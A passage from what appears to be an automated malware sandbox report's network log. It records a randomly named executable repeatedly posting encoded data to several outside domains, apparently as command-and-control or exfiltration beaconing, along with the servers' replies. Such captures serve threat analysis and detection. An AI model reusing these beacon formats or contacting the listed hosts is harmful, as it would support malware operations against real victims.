                                                                  Data Ascii: e6sH8=oUpW0YhmY+UamkOXlaHGS233u4zZQvgHOoWHeUFOoJqlFuvwTFdfRpfU0jYyz1LSidyF/iOIpMBHB9vKmV9rEi+FOs+o6t55VXs8NgC3VsBHx0CLo6LyOMuDJuQ+BRiNN+PwyOtF/q+kKi+y5CmLSKnxqGsJtTTuDf4IXkM3IkUhGBWEq/SA2NejwUE/2AWslqilpkBO9z6lzVrLTjxC/m5iq6uF
                                                                  Jan 11, 2025 01:22:35.540508986 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  x-powered-by: PHP/8.1.29
                                                                  cache-control: no-cache, private
                                                                  content-type: text/html; charset=UTF-8
                                                                  content-length: 1992
                                                                  content-encoding: br
                                                                  vary: Accept-Encoding
                                                                  date: Sat, 11 Jan 2025 00:22:35 GMT
                                                                  Jan 11, 2025 01:22:35.540528059 CET | 224 | IN
                                                                  Jan 11, 2025 01:22:35.540544987 CET | 781 | IN


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  15 | 192.168.2.5 | 49999 | 88.198.8.150 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:22:37.393759966 CET | 1747 | OUT | POST /2lci/ HTTP/1.1
                                                                  Host: www.snehasfashion.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.snehasfashion.shop
                                                                  Content-Length: 1242
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.snehasfashion.shop/2lci/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:22:38.065474987 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  x-powered-by: PHP/8.1.29
                                                                  cache-control: no-cache, private
                                                                  content-type: text/html; charset=UTF-8
                                                                  content-length: 1992
                                                                  content-encoding: br
                                                                  vary: Accept-Encoding
                                                                  date: Sat, 11 Jan 2025 00:22:37 GMT
                                                                  Jan 11, 2025 01:22:38.065526009 CET | 1005 | IN


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  16 | 192.168.2.5 | 50000 | 88.198.8.150 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:22:40.059693098 CET | 439 | OUT | GET /2lci/?rr=BbldmNsp8&e6sH8=lWB23sttXuwU7VKah9TQdWzGmdySIZI8VeHdcV4a5pKuSPzOO09MVK+LpGEounTDi5Cb1FGE36E3AeLK+XZDNCiHfOCZyv1qYWJ1bwu2fvFY8APk0KaeRNG0Pv4PAhLvZA== HTTP/1.1
                                                                  Host: www.snehasfashion.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:22:40.757504940 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  x-powered-by: PHP/8.1.29
                                                                  cache-control: no-cache, private
                                                                  content-type: text/html; charset=UTF-8
                                                                  content-length: 6603
                                                                  date: Sat, 11 Jan 2025 00:22:40 GMT
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Not Found</title> <style> /*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}code{font-family:monospace,monospace;font-size:1em}[hidden]{display:none}html{font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;line-height:1.5}*,:after,:before{box-sizing:border-box;border:0 solid #e2e8f0}a{color:inherit;text-decoration:inherit}code{font-family:Menlo,Monaco,Consolas,Liberation Mono,Courier New,monospace}svg,video{display:block;vertical-align:middle}video{max-width:100%;height:auto}.bg-white{--bg-opacity:1;background-color:#fff;background-color:rgba(255,255,255,var(--bg-opa [TRUNCATED]
                                                                  Jan 11, 2025 01:22:40.757567883 CET | 1236 | IN
                                                                  Jan 11, 2025 01:22:40.757602930 CET | 448 | IN
                                                                  Jan 11, 2025 01:22:40.757637024 CET | 1236 | IN
                                                                  Jan 11, 2025 01:22:40.757672071 CET | 1236 | IN
                                                                  Jan 11, 2025 01:22:40.757704973 CET | 1236 | IN
                                                                  Jan 11, 2025 01:22:40.757739067 CET179INData Raw: 20 74 65 78 74 2d 67 72 61 79 2d 35 30 30 20 75 70 70 65 72 63 61 73 65 20 74 72 61 63 6b 69 6e 67 2d 77 69 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4e 6f 74 20 46 6f 75 6e 64 20 20 20 20 20 20 20
                                                                  Data Ascii: text-gray-500 uppercase tracking-wider"> Not Found </div> </div> </div> </div> </body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  17 | 192.168.2.5 | 50001 | 104.21.15.100 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:22:45.812261105 CET | 704 | OUT | POST /s7xt/ HTTP/1.1
                                                                  Host: www.sitioseguro.blog
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.sitioseguro.blog
                                                                  Content-Length: 206
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.sitioseguro.blog/s7xt/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Ascii: e6sH8=HKwmnw8C74mvA+p9z1iCY1V1UgdybW9maJmexcRt5A2bu5bvDTjBuP0o5j00DljqSmWNux5dAeu4nWPLuH7RyVJJkKCl5rNLyStxlsDILiDX/7i4oo+b1YR8zsOoJWnm5XGVqji2xGGhy5vUi1JX9u6tfAT3rU4VO/r0BqtoI3+Suo02r32ts5zWwfNKJmDCDa0Je+k=
                                                                  Jan 11, 2025 01:22:46.352767944 CET | 954 | IN | HTTP/1.1 405 Not Allowed
                                                                  Date: Sat, 11 Jan 2025 00:22:46 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lGJ%2FxT1Rnu1%2FYoZhqPnAbn6wjbnA5auX4dNdYyqiQ%2BaGsh4yBHkB%2FGLSJK%2B5qXgIMF80DE3unBXw0Cj6n4nmQjBM9eGb9quirzURyAZM2XIy5K7l8IAtjRVxBx0dYdDmWbpTH7Dm%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 9000c11ada2142ce-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1687&rtt_var=843&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=704&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  18 | 192.168.2.5 | 50002 | 104.21.15.100 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:22:48.530961037 CET | 724 | OUT | POST /s7xt/ HTTP/1.1
                                                                  Host: www.sitioseguro.blog
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.sitioseguro.blog
                                                                  Content-Length: 226
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.sitioseguro.blog/s7xt/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Ascii: e6sH8=HKwmnw8C74mvAfZ91UiCdVV2IwdyR296aJ6exdEw5ySbuYrvCRHBvP0ohT18e1jjSmavuwFdAeK4nTLLuUTQ0FJH86Cn3LNLyStxlsXyLi7X/Oy4yJ+cpoR/0sOoDGnq5XGzqmCcxEOhy4fUikJUzu6rcwSOrBIfAZvZMJUoXn2Lm+FcxV+F/ZfugMF9YWirZ5k5ApytyY9vlomAwFNgrIsdVRCb
                                                                  Jan 11, 2025 01:22:48.948179007 CET | 944 | IN | HTTP/1.1 405 Not Allowed
                                                                  Date: Sat, 11 Jan 2025 00:22:48 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pyk1t4eCkq7TbYOKcAPsiGFySKHDb5VjDyvec2r9U2sJYBEWlUAo7i1XEJlu6lJ%2B6apCWIvIIVdwisiiCOyc5HdpdTfoX0cUFo89tXL8zGDuMFWU%2FgJ9WjLJk5p0my7hFX8eg%2BdPSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 9000c12b0d4c78e8-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=2018&rtt_var=1009&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=724&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>
                                                                  Jan 11, 2025 01:22:48.948985100 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  19 | 192.168.2.5 | 50003 | 104.21.15.100 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:22:51.160696030 CET | 1741 | OUT | POST /s7xt/ HTTP/1.1
                                                                  Host: www.sitioseguro.blog
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.sitioseguro.blog
                                                                  Content-Length: 1242
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.sitioseguro.blog/s7xt/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Ascii: e6sH8= [TRUNCATED]
                                                                  Jan 11, 2025 01:22:51.624514103 CET | 951 | IN | HTTP/1.1 405 Not Allowed
                                                                  Date: Sat, 11 Jan 2025 00:22:51 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SkGPCKKWsTKfS9pU9iP6yE%2B87Ls5k2j0uDGWvFZuLh1vO3v7CSHVMY6%2FdVsAbxZdj9Jwgz%2FiBeflAsgXPrXj0vQgP8y113yG4OVl7XNdGqmyu7iSxXM2ckiZ%2BHZUvpn00ySCkZBVGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 9000c13bca16de92-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1441&min_rtt=1441&rtt_var=720&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1741&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  20 | 192.168.2.5 | 50004 | 104.21.15.100 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:22:53.713139057 CET | 437 | OUT | GET /s7xt/?e6sH8=KIYGkFEpkLb5U9Z0/G2nYgR5FDZ6UiRQBMLs0+U/kh62mYb3aiLe2OdUmDxpEW63W2KDnmcIAZHjnyCR3mqA9TJ417GC4aJAohl/0/HIB1aq1+GW1q6O2aRbrP6PH2e8rA==&rr=BbldmNsp8 HTTP/1.1
                                                                  Host: www.sitioseguro.blog
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:22:54.253364086 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                  Date: Sat, 11 Jan 2025 00:22:54 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                                                  Accept-Ranges: bytes
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iU1KpoOQPqAtlvWomR55llqJF51RecMhA0OQ%2FywEAh%2Fox%2F%2FWM9bmPnHLuqr6ESWbNmpmIqtX%2Buc2DmIvDLH1ZuWGUgEiz9Tj4%2BSAknGalZaxzIuMak8JUVSbjiCU70PBkSrFAK%2BsbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 9000c14c4e1c0fa1-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1468&min_rtt=1468&rtt_var=734&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=437&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Ascii: 2dae<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  21 | 192.168.2.5 | 50005 | 46.253.5.221 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 11, 2025 01:22:59.310364008 CET | 695 | OUT | POST /gybb/ HTTP/1.1
                                                                  Host: www.windsky.click
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.windsky.click
                                                                  Content-Length: 206
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.windsky.click/gybb/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Ascii: e6sH8=sCcUsF5VlWhXMY1Xml8W110ikG9iYt+lSMt6C3t9tFfJUzmzARL0Hx4HL+OiZCvPqiR0sX5z8JsKJIHU2Xsd1fkCXndUqIaSo7XekyVYfmr8U2tkJ3NPJxwC7KaJQTj/yrRVO3D6OdZaAXM3/saFLh8EHTkrBcLGDBL5U6qd7ZGUmvvyaXkXN14hSoehZAQn1BKl/b4=
                                                                  Jan 11, 2025 01:23:00.101434946 CET  774  IN  HTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Sat, 11 Jan 2025 00:22:59 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Language: en
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Referrer-Policy: origin-when-cross-origin
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Expect-CT: enforce; max-age=3600
                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                  Strict-Transport-Security: max-age=63072000
                                                                  Content-Encoding: gzip


                                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                  22  192.168.2.5  50006  46.253.5.221  80  1240  C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                  Jan 11, 2025 01:23:02.839405060 CET  715  OUT  POST /gybb/ HTTP/1.1
                                                                  Host: www.windsky.click
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.windsky.click
                                                                  Content-Length: 226
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.windsky.click/gybb/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:23:03.649169922 CET  774  IN  HTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Sat, 11 Jan 2025 00:23:03 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Language: en
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Referrer-Policy: origin-when-cross-origin
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Expect-CT: enforce; max-age=3600
                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                  Strict-Transport-Security: max-age=63072000
                                                                  Content-Encoding: gzip


                                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                  23  192.168.2.5  50007  46.253.5.221  80  1240  C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                  Jan 11, 2025 01:23:05.390223026 CET  1732  OUT  POST /gybb/ HTTP/1.1
                                                                  Host: www.windsky.click
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.windsky.click
                                                                  Content-Length: 1242
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.windsky.click/gybb/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:23:06.191010952 CET  774  IN  HTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Sat, 11 Jan 2025 00:23:06 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Language: en
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Referrer-Policy: origin-when-cross-origin
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Expect-CT: enforce; max-age=3600
                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                  Strict-Transport-Security: max-age=63072000
                                                                  Content-Encoding: gzip


                                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                  24  192.168.2.5  50008  46.253.5.221  80  1240  C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                  Jan 11, 2025 01:23:07.933021069 CET  434  OUT  GET /gybb/?rr=BbldmNsp8&e6sH8=hA00v1ZIgX8EW+F3rWYc/zQviV8zTY6oC8gLC3V041/hGU+ZZxjILTR8UNm+bxrYgj9XtAZ4lfteOYOwyHEO4IQcXwxluILOpqvLxjlac2zTW2ZjXnd6ITs8lfiKZkyKwA== HTTP/1.1
                                                                  Host: www.windsky.click
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:23:08.749007940 CET  985  IN  HTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Sat, 11 Jan 2025 00:23:08 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Language: en
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Referrer-Policy: origin-when-cross-origin
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Expect-CT: enforce; max-age=3600
                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                  Strict-Transport-Security: max-age=63072000
                                                                  Data Ascii: 1f8 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="styles.css"> <title>Maitance message</title> </head> <body> <div class="maintenance-message"> <h1>The website is undergoing maintenance. Please come back later.</h1> </div> </body> </html> 0


                                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                  25  192.168.2.5  50009  107.167.84.42  80  1240  C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                  Jan 11, 2025 01:23:14.262600899 CET  692  OUT  POST /rjvg/ HTTP/1.1
                                                                  Host: www.cssa.auction
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.cssa.auction
                                                                  Content-Length: 206
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.cssa.auction/rjvg/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:23:14.813241005 CET  992  IN  HTTP/1.1 301 Moved Permanently
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 795
                                                                  date: Sat, 11 Jan 2025 00:23:14 GMT
                                                                  server: LiteSpeed
                                                                  location: https://www.cssa.auction/rjvg/
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                  26  192.168.2.5  50010  107.167.84.42  80  1240  C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                  Jan 11, 2025 01:23:16.812992096 CET  712  OUT  POST /rjvg/ HTTP/1.1
                                                                  Host: www.cssa.auction
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.cssa.auction
                                                                  Content-Length: 226
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.cssa.auction/rjvg/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:23:17.364053965 CET  992  IN  HTTP/1.1 301 Moved Permanently
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 795
                                                                  date: Sat, 11 Jan 2025 00:23:17 GMT
                                                                  server: LiteSpeed
                                                                  location: https://www.cssa.auction/rjvg/
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                  27  192.168.2.5  50011  107.167.84.42  80  1240  C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                  Jan 11, 2025 01:23:19.357899904 CET  1729  OUT  POST /rjvg/ HTTP/1.1
                                                                  Host: www.cssa.auction
